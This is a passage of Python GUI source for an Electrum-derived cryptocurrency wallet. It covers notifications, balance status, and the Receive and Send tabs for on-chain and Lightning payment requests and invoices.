txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum LitecoinFinance", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum LitecoinFinance", message, QSystemTrayIcon.Information, 20000)
    def timer_actions(self):
        """Periodic housekeeping driven by gui_object.timer."""
        self.request_list.refresh_status()
        # Note this runs in the GUI thread
        if self.need_update.is_set():
            self.need_update.clear()
            self.update_wallet()
        elif not self.wallet.up_to_date:
            # this updates "synchronizing" progress
            self.update_status()
        # resolve aliases
        # FIXME this is a blocking network call that has a timeout of 5 sec
        self.payto_e.resolve()
        self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both bitcoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BTC (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
    def connect_fields(self, window, btc_e, fiat_e, fee_e):
        """Keep a BTC amount edit and its fiat counterpart in sync.

        Editing either field recomputes the other using the current FX
        rate; the `follows` flag suppresses the recursive textChanged
        signal fired by the programmatic update.
        """
        def edit_changed(edit):
            if edit.follows:
                return  # change was made programmatically by the other field
            edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
            fiat_e.is_last_edited = (edit == fiat_e)
            amount = edit.get_amount()
            rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
            if rate.is_nan() or amount is None:
                # no usable rate or empty input: blank the counterpart
                if edit is fiat_e:
                    btc_e.setText("")
                    if fee_e:
                        fee_e.setText("")
                else:
                    fiat_e.setText("")
            else:
                if edit is fiat_e:
                    btc_e.follows = True
                    btc_e.setAmount(int(amount / Decimal(rate) * COIN))
                    btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    btc_e.follows = False
                    if fee_e:
                        window.update_fee()
                else:
                    fiat_e.follows = True
                    fiat_e.setText(self.fx.ccy_amount_str(
                        amount * Decimal(rate) / COIN, False))
                    fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
                    fiat_e.follows = False
        btc_e.follows = False
        fiat_e.follows = False
        fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
        btc_e.textChanged.connect(partial(edit_changed, btc_e))
        fiat_e.is_last_edited = False
    def update_status(self):
        """Refresh the balance label, tray tooltip and status-bar icon
        according to network/sync state."""
        if not self.wallet:
            return
        if self.network is None:
            text = _("Offline")
            icon = read_QIcon("status_disconnected.png")
        elif self.network.is_connected():
            server_height = self.network.get_server_height()
            server_lag = self.network.get_local_height() - server_height
            fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
            # Server height can be 0 after switching to a new server
            # until we get a headers subscription request response.
            # Display the synchronizing message in that case.
            if not self.wallet.up_to_date or server_height == 0:
                num_sent, num_answered = self.wallet.get_history_sync_state_details()
                text = ("{} ({}/{})"
                        .format(_("Synchronizing..."), num_answered, num_sent))
                icon = read_QIcon("status_waiting.png")
            elif server_lag > 1:
                text = _("Server is lagging ({} blocks)").format(server_lag)
                icon = read_QIcon("status_lagging%s.png"%fork_str)
            else:
                # c/u/x: confirmed, unconfirmed, unmatured balances
                c, u, x = self.wallet.get_balance()
                text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
                if u:
                    text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
                if x:
                    text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
                if self.wallet.has_lightning():
                    l = self.wallet.lnworker.get_balance()
                    text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
                # append fiat balance and price
                if self.fx.is_enabled():
                    text += self.fx.get_fiat_status_text(c + u + x,
                        self.base_unit(), self.get_decimal_point()) or ''
                if not self.network.proxy:
                    icon = read_QIcon("status_connected%s.png"%fork_str)
                else:
                    icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
        else:
            if self.network.proxy:
                text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
            else:
                text = _("Not connected")
            icon = read_QIcon("status_disconnected.png")
        if self.tray:
            self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
        self.balance_label.setText(text)
        if self.status_button:
            self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
    def show_transaction(self, tx, *, tx_desc=None):
        '''Open the transaction-details dialog for *tx*.
        tx_desc is set only for txs created in the Send tab.'''
        show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
    def create_receive_tab(self):
        """Build the Receive tab: request form (description, amount, expiry),
        the address/request/QR views, and the list of past requests."""
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 0, 0)
        grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)
        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 1, 0)
        grid.addWidget(self.receive_amount_e, 1, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)
        # Fiat mirror of the amount field; hidden unless exchange rates are on.
        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        # NOTE(review): self.amount_e / self.fiat_send_e are created in
        # create_send_tab() — this assumes the Send tab is built first; confirm.
        self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
        # Expiry selector, preset from the configured default.
        self.expires_combo = QComboBox()
        evl = sorted(pr_expiration_values.items())
        evl_keys = [i[0] for i in evl]
        evl_values = [i[1] for i in evl]
        default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
        try:
            i = evl_keys.index(default_expiry)
        except ValueError:
            # Configured value is not one of the presets: fall back to first.
            i = 0
        self.expires_combo.addItems(evl_values)
        self.expires_combo.setCurrentIndex(i)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        def on_expiry(i):
            # Persist the newly chosen expiry as the default for next time.
            self.config.set_key('request_expiry', evl_keys[i])
        self.expires_combo.currentIndexChanged.connect(on_expiry)
        msg = ''.join([
            _('Expiration date of your request.'), ' ',
            _('This information is seen by the recipient if you send them a signed payment request.'),
            '\n\n',
            _('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
            _('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
            _('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
            '\n\n',
            _('For Lightning requests, payments will not be accepted after the expiration.'),
        ])
        grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
        grid.addWidget(self.expires_combo, 2, 1)
        # Read-only label shown (in place of the combo) for existing requests.
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 2, 1)
        self.clear_invoice_button = QPushButton(_('Clear'))
        self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
        self.create_invoice_button = QPushButton(_('New Address'))
        self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
        self.create_invoice_button.setToolTip('Create on-chain request')
        self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_invoice_button)
        buttons.addWidget(self.create_invoice_button)
        # With Lightning enabled, add a second button for LN requests.
        if self.wallet.has_lightning():
            self.create_invoice_button.setText(_('New Address'))
            self.create_lightning_invoice_button = QPushButton(_('Lightning'))
            self.create_lightning_invoice_button.setToolTip('Create lightning request')
            self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
            self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
            buttons.addWidget(self.create_lightning_invoice_button)
        grid.addLayout(buttons, 4, 3, 1, 2)
        # Read-only view of the serialized payment request.
        self.receive_payreq_e = ButtonsTextEdit()
        self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
        self.receive_payreq_e.addCopyButton(self.app)
        self.receive_payreq_e.setReadOnly(True)
        self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
        self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
        # QR widget; clicking it toggles the detached QR window.
        self.receive_qr = QRCodeWidget(fixedSize=220)
        self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
        self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
        self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
        # Read-only view of the receiving address.
        self.receive_address_e = ButtonsTextEdit()
        self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
        self.receive_address_e.addCopyButton(self.app)
        self.receive_address_e.setReadOnly(True)
        self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
        qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
        qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
        self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
        self.receive_requests_label = QLabel(_('Receive queue'))
        from .request_list import RequestList
        self.request_list = RequestList(self)
        # Tabbed Address / Request / QR views; remember the last-used tab.
        receive_tabs = QTabWidget()
        receive_tabs.addTab(self.receive_address_e, _('Address'))
        receive_tabs.addTab(self.receive_payreq_e, _('Request'))
        receive_tabs.addTab(self.receive_qr, _('QR Code'))
        receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
        receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
        receive_tabs_sp = receive_tabs.sizePolicy()
        receive_tabs_sp.setRetainSizeWhenHidden(True)
        receive_tabs.setSizePolicy(receive_tabs_sp)
        def maybe_hide_receive_tabs():
            # Only show the views once there is a request to display.
            receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
        self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
        maybe_hide_receive_tabs()
        # layout
        vbox_g = QVBoxLayout()
        vbox_g.addLayout(grid)
        vbox_g.addStretch()
        hbox = QHBoxLayout()
        hbox.addLayout(vbox_g)
        hbox.addStretch()
        hbox.addWidget(receive_tabs)
        w = QWidget()
        w.searchable_list = self.request_list
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.receive_requests_label)
        vbox.addWidget(self.request_list)
        vbox.setStretchFactor(self.request_list, 1000)
        return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
    def sign_payment_request(self, addr):
        """If an alias is configured and resolves to one of our own addresses,
        sign the payment request for *addr* with it; otherwise do nothing."""
        alias = self.config.get('alias')
        if alias and self.alias_info:
            alias_addr, alias_name, validated = self.alias_info
            if alias_addr:
                if self.wallet.is_mine(alias_addr):
                    msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
                    password = None
                    if self.wallet.has_keystore_encryption():
                        password = self.password_dialog(msg)
                        if not password:
                            # User cancelled the password prompt: abort signing.
                            return
                    try:
                        self.wallet.sign_payment_request(addr, alias, alias_addr, password)
                    except Exception as e:
                        self.show_error(repr(e))
                        return
                else:
                    # Alias address is not ours: nothing we can sign with.
                    return
    def create_invoice(self, is_lightning):
        """Create a receive request (Lightning or on-chain) from the form
        fields, select it in the request list, and copy it to the clipboard."""
        amount = self.receive_amount_e.get_amount()
        message = self.receive_message_e.text()
        expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
        if is_lightning:
            if not self.wallet.lnworker.channels:
                self.show_error(_("You need to open a Lightning channel first."))
                return
            # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
            key = self.wallet.lnworker.add_request(amount, message, expiry)
        else:
            key = self.create_bitcoin_request(amount, message, expiry)
            if not key:
                # User aborted in create_bitcoin_request().
                return
            self.address_list.update()
        assert key is not None
        self.request_list.update()
        self.request_list.select_key(key)
        # clear request fields
        self.receive_amount_e.setText('')
        self.receive_message_e.setText('')
        # copy to clipboard
        r = self.wallet.get_request(key)
        content = r.invoice if r.is_lightning() else r.get_address()
        title = _('Invoice') if is_lightning else _('Address')
        self.do_copy(content, title=title)
    def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
        """Create an on-chain payment request and return its address,
        or None if the user aborted. May reuse an address when the wallet
        has no unused ones left (after asking the user)."""
        addr = self.wallet.get_unused_address()
        if addr is None:
            if not self.wallet.is_deterministic():  # imported wallet
                msg = [
                    _('No more addresses in your wallet.'), ' ',
                    _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
                    _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
                    _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
                ]
                if not self.question(''.join(msg)):
                    return
                addr = self.wallet.get_receiving_address()
            else:  # deterministic wallet
                # Warn before extending the gap limit (seed recovery caveat).
                if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
                    return
                addr = self.wallet.create_new_address(False)
        req = self.wallet.make_payment_request(addr, amount, message, expiration)
        try:
            self.wallet.add_payment_request(req)
        except Exception as e:
            self.logger.exception('Error adding payment request')
            self.show_error(_('Error adding payment request') + ':\n' + repr(e))
        else:
            self.sign_payment_request(addr)
        return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
    def toggle_qr_window(self):
        """Show or hide the detached QR window, preserving its geometry
        across hide/show cycles."""
        from . import qrwindow
        if not self.qr_window:
            # First use: create the window and remember its initial geometry.
            self.qr_window = qrwindow.QR_Window(self)
            self.qr_window.setVisible(True)
            self.qr_window_geometry = self.qr_window.geometry()
        else:
            if not self.qr_window.isVisible():
                # Re-show at the position the user last placed it.
                self.qr_window.setVisible(True)
                self.qr_window.setGeometry(self.qr_window_geometry)
            else:
                # Save the geometry before hiding so it can be restored.
                self.qr_window_geometry = self.qr_window.geometry()
                self.qr_window.setVisible(False)
        self.update_receive_qr()
    def show_send_tab(self):
        # Bring the Send tab to the front.
        self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
    def show_receive_tab(self):
        # Bring the Receive tab to the front.
        self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
    def create_send_tab(self):
        """Build the Send tab: pay-to/description/amount form, action
        buttons, and the list of queued invoices."""
        # A 4-column grid layout. All the stretch is in the last column.
        # The exchange rate plugin adds a fiat widget in column 2
        self.send_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)
        from .paytoedit import PayToEdit
        self.amount_e = BTCAmountEdit(self.get_decimal_point)
        self.payto_e = PayToEdit(self)
        self.payto_e.addPasteButton(self.app)
        msg = _('Recipient of the funds.') + '\n\n'\
              + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
        payto_label = HelpLabel(_('Pay to'), msg)
        grid.addWidget(payto_label, 1, 0)
        grid.addWidget(self.payto_e, 1, 1, 1, -1)
        # Autocompletion of contacts in the pay-to field.
        completer = QCompleter()
        completer.setCaseSensitivity(False)
        self.payto_e.set_completer(completer)
        completer.setModel(self.completions)
        msg = _('Description of the transaction (not mandatory).') + '\n\n'\
              + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
        description_label = HelpLabel(_('Description'), msg)
        grid.addWidget(description_label, 2, 0)
        self.message_e = FreezableLineEdit()
        self.message_e.setMinimumWidth(700)
        grid.addWidget(self.message_e, 2, 1, 1, -1)
        msg = _('Amount to be sent.') + '\n\n' \
              + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
              + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
              + _('Keyboard shortcut: type "!" to send all your coins.')
        amount_label = HelpLabel(_('Amount'), msg)
        grid.addWidget(amount_label, 3, 0)
        grid.addWidget(self.amount_e, 3, 1)
        # Fiat mirror of the amount; hidden unless exchange rates are enabled.
        self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_send_e.setVisible(False)
        grid.addWidget(self.fiat_send_e, 3, 2)
        self.amount_e.frozen.connect(
            lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
        self.max_button = EnterButton(_("Max"), self.spend_max)
        self.max_button.setFixedWidth(100)
        self.max_button.setCheckable(True)
        grid.addWidget(self.max_button, 3, 3)
        self.save_button = EnterButton(_("Save"), self.do_save_invoice)
        self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
        self.clear_button = EnterButton(_("Clear"), self.do_clear)
        buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_button)
        buttons.addWidget(self.save_button)
        buttons.addWidget(self.send_button)
        grid.addLayout(buttons, 6, 1, 1, 4)
        # "!" shortcut in the amount field triggers spend-max.
        self.amount_e.shortcut.connect(self.spend_max)
        def reset_max(text):
            # Any manual edit of the amount cancels "Max" mode.
            self.max_button.setChecked(False)
            enable = not bool(text) and not self.amount_e.isReadOnly()
            #self.max_button.setEnabled(enable)
        self.amount_e.textEdited.connect(reset_max)
        self.fiat_send_e.textEdited.connect(reset_max)
        self.set_onchain(False)
        self.invoices_label = QLabel(_('Send queue'))
        from .invoice_list import InvoiceList
        self.invoice_list = InvoiceList(self)
        # layout
        vbox0 = QVBoxLayout()
        vbox0.addLayout(grid)
        hbox = QHBoxLayout()
        hbox.addLayout(vbox0)
        hbox.addStretch(1)
        w = QWidget()
        vbox = QVBoxLayout(w)
        vbox.addLayout(hbox)
        vbox.addStretch(1)
        vbox.addWidget(self.invoices_label)
        vbox.addWidget(self.invoice_list)
        vbox.setStretchFactor(self.invoice_list, 1000)
        w.searchable_list = self.invoice_list
        # Let plugins (e.g. exchange rate) extend the grid.
        run_hook('create_send_tab', grid)
        return w
    def spend_max(self):
        """'Max' button / '!' shortcut handler: fill the amount field with
        everything that can be sent to the current outputs."""
        if run_hook('abort_send', self):
            return
        outputs = self.payto_e.get_outputs(True)
        if not outputs:
            return
        make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
            coins=self.get_coins(),
            outputs=outputs,
            fee=fee_est,
            is_sweep=False)
        try:
            try:
                tx = make_tx(None)
            except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
                # Check if we had enough funds excluding fees,
                # if so, still provide opportunity to set lower fees.
                tx = make_tx(0)
        except MultipleSpendMaxTxOutputs as e:
            self.max_button.setChecked(False)
            self.show_error(str(e))
            return
        except NotEnoughFunds as e:
            # Even a zero-fee tx doesn't fit: report, mentioning frozen funds.
            self.max_button.setChecked(False)
            text = self.get_text_not_enough_funds_mentioning_frozen()
            self.show_error(text)
            return
        self.max_button.setChecked(True)
        amount = tx.output_value()
        # Plugins (e.g. trustedcoin) may charge an extra fee on top.
        __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
        amount_after_all_fees = amount - x_fee_amount
        self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
    @protected
    def protect(self, func, args, password):
        # Generic wrapper to run *func* behind the @protected password
        # prompt; the decorator supplies *password*.
        return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
    def check_send_tab_payto_line_and_show_errors(self) -> bool:
        """Returns whether there are errors.
        Also shows error dialog to user if so.
        """
        pr = self.payment_request
        if pr:
            if pr.has_expired():
                self.show_error(_('Payment request has expired'))
                return True
        if not pr:
            # Free-form pay-to lines: report parse errors collected by the editor.
            errors = self.payto_e.get_errors()
            if errors:
                if len(errors) == 1 and not errors[0].is_multiline:
                    err = errors[0]
                    self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
                                      f"{err.line_content[:40]}...\n\n"
                                      f"{err.exc!r}")
                else:
                    self.show_warning(_("Invalid Lines found:") + "\n\n" +
                                      '\n'.join([_("Line #") +
                                                 f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
                                                 for err in errors]))
                return True
            # Alias that failed DNSSEC validation: let the user decide.
            if self.payto_e.is_alias and self.payto_e.validated is False:
                alias = self.payto_e.toPlainText()
                msg = _('WARNING: the alias "{}" could not be validated via an additional '
                        'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
                msg += _('Do you wish to continue?')
                if not self.question(msg):
                    return True
        return False  # no errors
    def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
        """Confirm with the user and pay a BOLT11 invoice via the LN worker
        (runs in the wallet's background thread)."""
        if amount_msat is None:
            raise Exception("missing amount for LN invoice")
        amount_sat = Decimal(amount_msat) / 1000
        # FIXME this is currently lying to user as we truncate to satoshis
        msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
        if not self.question(msg):
            return
        self.save_pending_invoice()
        def task():
            # Executed on the wallet thread; blocks until payment resolves.
            coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS)
            fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
            return fut.result()
        self.wallet.thread.add(task)
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
req = self.wallet.receive_requests.get(key)
if req is None:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
else:
self.request_list.update_item(key, req)
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
invoice = self.wallet.get_invoice(key)
if invoice is None:
return
status = self.wallet.get_invoice_status(invoice)
if status == PR_PAID:
self.invoice_list.update()
else:
self.invoice_list.update_item(key, invoice)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
    def on_payment_failed(self, wallet, key, reason):
        # Surface the failure reason reported by the payment worker.
        self.show_error(_('Payment failed') + '\n\n' + reason)
    def read_invoice(self):
        """Build an invoice object from the Send tab fields, or return None
        (after showing an error) when the form is invalid."""
        if self.check_send_tab_payto_line_and_show_errors():
            return
        if not self._is_onchain:
            # Lightning mode: the pay-to editor holds a BOLT11 invoice.
            invoice_str = self.payto_e.lightning_invoice
            if not invoice_str:
                return
            if not self.wallet.has_lightning():
                self.show_error(_('Lightning is disabled'))
                return
            invoice = LNInvoice.from_bech32(invoice_str)
            if invoice.get_amount_msat() is None:
                # Amount-less invoice: take the amount from the form field.
                amount_sat = self.amount_e.get_amount()
                if amount_sat:
                    invoice.amount_msat = int(amount_sat * 1000)
                else:
                    self.show_error(_('No amount'))
                    return
            return invoice
        else:
            outputs = self.read_outputs()
            if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
                return
            message = self.message_e.text()
            return self.wallet.create_invoice(
                outputs=outputs,
                message=message,
                pr=self.payment_request,
                URI=self.payto_URI)
def do_save_invoice(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.save_pending_invoice()
    def save_pending_invoice(self):
        """Persist self.pending_invoice (if any) to the wallet's send queue
        and reset the send form."""
        if not self.pending_invoice:
            return
        # NOTE(review): the form is cleared before saving — presumably so the
        # editor state is reset even if persisting has side effects; confirm.
        self.do_clear()
        self.wallet.save_invoice(self.pending_invoice)
        self.invoice_list.update()
        self.pending_invoice = None
def do_pay(self):
self.pending_invoice = self.read_invoice()
if not self.pending_invoice:
return
self.do_pay_invoice(self.pending_invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
    def do_pay_invoice(self, invoice: 'Invoice'):
        """Dispatch payment of *invoice* by its type (Lightning vs on-chain)."""
        if invoice.type == PR_TYPE_LN:
            assert isinstance(invoice, LNInvoice)
            self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
        elif invoice.type == PR_TYPE_ONCHAIN:
            assert isinstance(invoice, OnchainInvoice)
            self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
        else:
            raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
    def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
        """Return a list of selected coins or None.
        Note: None means selection is not being used,
        while an empty sequence means the user specifically selected that.
        """
        # Delegates to the coins view, which tracks the user's selection.
        return self.utxo_list.get_spend_list()
def get_text_not_enough_funds_mentioning_frozen(self) -> str:
text = _("Not enough funds")
frozen_bal = sum(self.wallet.get_frozen_balance())
if frozen_bal:
text += " ({} {} {})".format(
self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen")
)
return text
    def pay_onchain_dialog(
            self, inputs: Sequence[PartialTxInput],
            outputs: List[PartialTxOutput], *,
            external_keypairs=None) -> None:
